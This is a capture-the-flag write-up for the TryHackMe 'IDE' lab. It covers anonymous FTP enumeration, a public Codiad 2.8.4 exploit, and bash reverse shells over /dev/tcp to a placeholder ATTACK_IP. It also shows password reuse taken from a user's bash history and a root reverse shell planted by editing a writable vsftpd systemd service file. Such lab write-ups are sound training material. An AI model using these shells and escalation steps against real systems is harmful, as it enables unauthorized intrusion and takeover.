TryHackMe IDE Writeup
This writeup will help you solve the TryHackMe IDE box.
Before we start enumerating the box, add the following line to your /etc/hosts file.
echo "ide.thm" >> /etc/hosts
TryHackMe IDE – Enumeration
As per usual, we start by running a port scan on the host using nmap. The sC and
sV flags indicate that basic vulnerability scripts are executed against the target and that the port
scan tries to find version information. You can scan all possible 65535 ports using the -p flag.
nmap -sV -sC -p- ide.thm
You can see the output of this scan below:
PORT STATE SERVICE REASON VERSION 21/tcp open ftp syn-ack vsftpd 3.0.3 |_ftp-anon: Anonymous FTP login allowed (FTP code 230) | ftp-syst: | STAT: | FTP server status: | Connected to ::ffff:10.9.2.89 | Logged in as ftp | TYPE: ASCII | No session bandwidth limit | Session timeout in seconds is 300 | Control connection is plain text | Data connections will be plain text | At session startup, client count was 3 | vsFTPd 3.0.3 - secure, fast, stable |_End of status 22/tcp open ssh syn-ack OpenSSH 7.6p1 Ubuntu 4ubuntu0.3 (Ubuntu Linux; protocol 2.0) | ssh-hostkey: | 2048 e2:be:d3:3c:e8:76:81:ef:47:7e:d0:43:d4:28:14:28 (RSA) | ssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAABAQC94RvPaQ09Xx+jMj32opOMbghuvx4OeBVLc+/4Hascmrtsa+SMtQGSY7b+eyW8Zymxi94rGBIN2ydPxy3XXGtkaCdQluOEw5CqSdb/qyeH+L/1PwIhLrr+jzUoUzmQil+oUOpVMOkcW7a00BMSxMCij0HdhlVDNkWvPdGxKBviBDEKZAH0hJEfexz3Tm65cmBpMe7WCPiJGTvoU9weXUnO3+41Ig8qF7kNNfbHjTgS0+XTnDXk03nZwIIwdvP8dZ8lZHdooM8J9u0Zecu4OvPiC4XBzPYNs+6ntLziKlRMgQls0e3yMOaAuKfGYHJKwu4AcluJ/+g90Hr0UqmYLHEV | 256 a8:82:e9:61:e4:bb:61:af:9f:3a:19:3b:64:bc:de:87 (ECDSA) | ecdsa-sha2-nistp256 AAAAE2VjZHNhLXNoYTItbmlzdHAyNTYAAAAIbmlzdHAyNTYAAABBBBzKTu7YDGKubQ4ADeCztKu0LL5RtBXnjgjE07e3Go/GbZB2vAP2J9OEQH/PwlssyImSnS3myib+gPdQx54lqZU= | 256 24:46:75:a7:63:39:b6:3c:e9:f1:fc:a4:13:51:63:20 (ED25519) |_ssh-ed25519 AAAAC3NzaC1lZDI1NTE5AAAAIJ+oGPm8ZVYNUtX4r3Fpmcj9T9F2SjcRg4ansmeGR3cP 80/tcp open http syn-ack Apache httpd 2.4.29 ((Ubuntu)) | http-methods: |_ Supported Methods: GET POST OPTIONS HEAD |_http-server-header: Apache/2.4.29 (Ubuntu) |_http-title: Apache2 Ubuntu Default Page: It works 62337/tcp open http syn-ack Apache httpd 2.4.29 ((Ubuntu)) |_http-favicon: Unknown favicon MD5: B4A327D2242C42CF2EE89C623279665F | http-methods: |_ Supported Methods: GET HEAD POST OPTIONS |_http-server-header: Apache/2.4.29 (Ubuntu) |_http-title: Codiad 2.8.4 Service Info: OSs: Unix, Linux; CPE: cpe:/o:linux:linux_kernel
There are 4 open ports. Port 21 serves FTP. Important to note here is that anonymous login is allowed. Port 22 serves for SSH. Port 80 serves a web server. Port 62337 servers as a web server also, running Codiad. Codiad is a web IDE. For now, let’s start with the enumeration of the FTP server. Try to log in using the following command:
ftp ide.thm
When prompted, provide the anonymous username and anything as a password. If you fill in both correctly, you should be able to run the following command:
ls -al
The output of this command can be seen below:
drwxr-xr-x 2 0 0 4096 Jun 18 06:11 ... drwxr-xr-x 3 0 114 4096 Jun 18 06:10 .. drwxr-xr-x 3 0 114 4096 Jun 18 06:10 .
Here, we can find an hidden directory named: ... Change directories to ... Within this directory, we locate the hidden file named: -. Execute the following command to download this file to your machine.
get ./-
The file you just downloaded has the following content:
Hey REDACTED_USERNAME, I have reset the password as you have asked. Please use the default password to login. Also, please take care of the image file ;) - drac.
It seems like we found a username! However, we still need to find a password and a system to fill in the credentials. Next, we will enumerate the service running gon port: 62337. Browsing to http://ide.thm:62337 shows us the following web page:
TryHackMe IDE – User Flag
We can log in to this portal using the earlier found username and an easy to guess password. If you are struggling with finding the password, you can brute-force all passwords within this list. Codiad is a web-based IDE where one can write and compile code. Version 2.8.4 is running on the server. This version is exploitable by the following exploit
In order to obtain a user shell you should execute the following commands:
python3 49705.py http://ide.thm:62337/ REDACTED_USER REDACTED_PASS ATTACK_IP ATTACK_PORT linux
After running the command above, you should run the following 2 commands in 2 different shells.
echo 'bash -c "bash -i >/dev/tcp/ATTACK_IP/9002 0>&1 2>&1"' | nc -lnvp 9001 nc -lnvp 9002
Confirm you are running these commands. Open the terminal in which you ran the command: nc -lnvp 9002. You should find a shell spawned as the www-data user. Elevate your shell to a TTY shell by running the following commands:
python3 -c 'import pty;pty.spawn("/bin/bash")'
CTRL+Z
stty raw -echo;fg
ENTER
ENTER
Now that we have an initial foothold to the server, we have to gain user privileges. Checking the /home directory, we can find that there is currently one user having a directory within the /home directory. The bash history is readable for every user. Run the following command to read the bash history of the drac user.
cat /home/drac/.bash_history
We can find the following line in the .bash_history file.
mysql -u drac -p 'REDACTED'
The drac user might have re-used this password to log into his account as well. Let’s check if this is the case. Run the following command:
su drac
Enter the password you just found to gain privileges as the drac user!
TryHackMe IDE – Root Flag
Matching Defaults entries for drac on ide:
env_reset, mail_badpass,
secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/bin
User drac may run the following commands on ide:
(ALL : ALL) /usr/sbin/service vsftpd restart
We have root privileges on the restart command of the vsftpd service. If we can this file as the current user, we should be able to elevate privileges. First, we have to find the location of this service. Do so by running:
systemctl status vsftpd
The output of this command is shown below:
● vsftpd.service - vsftpd FTP server
Loaded: loaded (/lib/systemd/system/vsftpd.service; enabled; vendor preset: e
Active: active (running) since Mon 2021-11-15 16:19:04 UTC; 37min ago
Process: 743 ExecStartPre=/bin/mkdir -p /var/run/vsftpd/empty (code=exited, st
Main PID: 805 (vsftpd)
Tasks: 1 (limit: 498)
CGroup: /system.slice/vsftpd.service
└─805 /usr/sbin/vsftpd /etc/vsftpd.conf
As you can see, the location of the service file is: /lib/systemd/system/vsftpd.service. Check the privileges of this service by running:
ls -al /lib/systemd/system/vsftpd.service
The output is shown below:
-rw-rw-r-- 1 root drac 248 Aug 4 07:24 /lib/systemd/system/vsftpd.service
The service file contains write privileges for the drac group. Meaning that we can edit this file without any permission issues. Open up this file with your favorite editor and change its content to the following:
[Unit] Description=vsftpd FTP server After=network.target [Service] Type=simple ExecStart=/bin/bash -c 'bash -i >& /dev/tcp/ATTACK_IP/9003 0>&1 ExecReload=/bin/kill -HUP $MAINPID ExecStartPre=-/bin/mkdir -p /var/run/vsftpd/empty [Install] WantedBy=multi-user.target
Now start a new Netcat listener on your local machine by running:
nc -lvnp 9003
Now, because the service file is edited you should run: systemctl daemon-reload first. You should enter the password for the drac user. Afterwards, run:
sudo /usr/sbin/service vsftpd restart
After executing the restart of the service, you should receive a root shell in the listening terminal. The root.txt is located at: /root/root.txt.
IDE was an easy box to root. It involves an old version of Codiad that contains a public exploit. It is also important to use strong forms of authentication. Last,
users should not have full control over a Linux service. If in control, they are able to elevate privileges fairly easy.
